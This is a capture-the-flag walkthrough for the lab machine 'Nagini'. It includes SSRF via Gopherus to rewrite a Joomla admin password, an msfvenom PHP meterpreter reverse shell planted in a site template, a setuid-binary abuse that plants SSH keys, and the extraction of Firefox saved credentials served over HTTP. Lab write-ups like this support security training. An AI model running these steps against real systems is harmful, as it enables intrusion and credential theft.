In the first machine of the Harry Potter series, Aragog, we found out two of the eight Horcruxes. Nagini is the second machine of the series with medium difficulty. However, I found it pretty difficult nonetheless. Let’s begin our journey to find Nagini, the vicious snake. I won’t be explaining all of the steps which I have already explained in the previous post.
fping -aqg 10.0.2.0/24
ports=$(nmap -p- --min-rate=1000 -T4 10.0.2.7 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -p$ports -sC -sV 10.0.2.7
Directory browsing (dirb or gobuster)
gobuster dir -u http://10.0.2.7 -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt
We found out that there is a directory /joomla which might Joomla CMS installed. Likewise, there is a note present in the server.
It looks as if the server is using http3 protocol which isn’t currently supported by the browser. Doing some research, I found out that we could build cloudflare’s quiche repo for the purpose.
Troubleshoot: There is an issue with pre-installed rust package. Remove the pre-installed one and use from the GitHub.
Open using HTTP3
Change the directory to quiche/target/debug/examples.
cd quiche/target/debug/examples ./http3-client https://10.0.2.7
Using the reference: https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery, I used the payload 127.0.0.1 if it loads me up to the main page and it does.
Use joomscan for sensitive information
joomscan -u http://10.0.2.7/joomla -ec
wget http://10.0.2.7/joomla/configuration.php.bak cat configuration.php.bak
Use Gopherus to execute mysql statements
Note: Gopherus only work if password is not set for the user. In our case, the user goblin doesn’t have a password.
Statement 1: SHOW databases;
We will copy the link and paste it to the internal resource fetching page. Also, we might have to refresh multiple times to make the link work.
Now, we have to identify the value from the obscure text. We can execute any statement using this method.
Statement 2: USE joomla; SHOW tables;
Statement 3: USE joomla; SELECT * FROM joomla_users;
Statement 4: USE joomla; SELECT password FROM joomla_users WHERE email=’email@example.com’;
So, if we can update the password for the user site_admin, we can easily login to our joomla page.
Statement 5: USE joomla; UPDATE joomla_users SET password=’5f4dcc3b5aa765d61d8327deb882cf99′ WHERE email=’firstname.lastname@example.org’;
We have used MD5 of our new password ‘password’ because it is supported in mysql in joomla.
Inject webshell payload
We can generate a PHP reverse shell payload using msfvenom or the webshell available in the kali linux or parrot os distro, or anywhere from internet. Since we use the web shell from kali linux in the previous machine, I will be using msfvenom in this machine. Maybe we can use meterpreter or multi/exploit/handler of metasploit framework for the sake of using the tool. I just want to show you the ways to get the reverse shell.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f raw
Here, I have used a stager payload which spawns a meterpreter shell. However, to use the meterpreter shell, we have to listen on msfconsole multi handler module.
Let’s first copy the output and put it in the templates of joomla. I prefer error pages.
We pasted the shell code in the PHP code block right before the <!DOCTYPE html> declaration. Also, don’t forget to save the page.
use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost 10.0.2.15 set lport 4444 run
Invoke Error Page
As we know, the frameworks so an error message for page not found or bad request.
With a meterpreter shell, we can do many things, however, we will be getting a linux shell from there.
cd .. ls -al cat horcrux1.txt
3: SlythEriN's LocKEet dEstroYeD bY RoN
Privilege User – Snape
cd /home/hermoine ls -al cd bin
We saw that a binary
su_cp has setuid permission of hermoine. When we run the binary, we saw that it is an alternative to cp command of linux.
Let’s look inside another user snape.
cd /home/snape ls -al cat .creds.txt
Looks like we have a base64 encoded text. Let’s decode that and see the password.
We have the password.
Since, we have the password now, we can login using ssh as seen from the initial enumeration.
Privilege User – Hermoine
In linux, there is a file called
authorized keys with restrictive read and write permission. If we store our own public keys to that file, we should be able to login using our private key to the server.
As we know that, su_cp has setuid permission of hermoine. So, we can create a file authorized_keys using our user snape. Then, we can impersonate hermoine to give her permission to the file.
On attacker’s machine:
Copy the content.
echo <<Your public key>> > authorized_keys chmod 640 authorized_keys ls -al
I mistakenly deleted the .ssh folder from hermoine’s account but I got the same using the exploit. So, if you have .ssh folder inside hermoine’s home directory, you don’t need to do this.
mkdir /tmp/.ssh ./su_cp -p -r /home/snape/authorized_keys .ssh/
Now, let’s copy the authorized keys.
cd /home/hermoine/bin ./su_cp -p /home/snape/authorized_keys /home/hermoine/.ssh/
Let’s try login using hermoine. But this time, we have to use our private key since we don’t have password and we have already added our public key to the authorized_keys.
# on attacker machine ssh email@example.com -i .ssh/id_rsa
We got access to hermoine. Now, we are going to put some enumeration scripts like linpeas.sh and pspy. You can use any method to transfer files like creating own server and using wget, transfer via scp, etc.
Let’s find the horcrux2.txt.
4: Helga Hufflepuff's Cup destroyed by Hermione
Running linpeas.sh, we find out that we might have some credentials in our mozilla store as we saw from hermoine’s directory.
./linpeas.sh | tee output cat output | grep login
On doing some research, we could actually get credentials from mozilla. So, there is a tool called firepwd which allows the action.
It needs, logins.json and key4.db
cd .mozilla/firefox/g2mhbq0o.default/ ls -al
Let’s check if we can run python script on target machine.
which python which python3
Let’s create a server on our target machine from where the credential files can be downloaded.
python3 -m http.server 9000
On local machine, let’s install the requirements of firepwd,
cd firepwd sudo pip install -r requirements.txt
On a directory, copy the firepwd.py script and download the credentials files.
mkdir creds cd creds cp ~/firepwd/firepwd.py ~/creds/ wget http://10.0.2.15:9000/logins.json wget http://10.0.2.15:9000/logins.json
We got the password. Now, let’s try ssh using root. Or, just just switch using su.
Let’s see the last horcrux.
cd /root cat horcrux3.txt
5: Diadem of Ravenclaw destroyed by Harry
The machine is pretty good. The foothold part was difficult, however, once you got the reverse shell, the things aren’t that hard. You will find the difficult stuff in the last machine of the series ‘Fawkes’.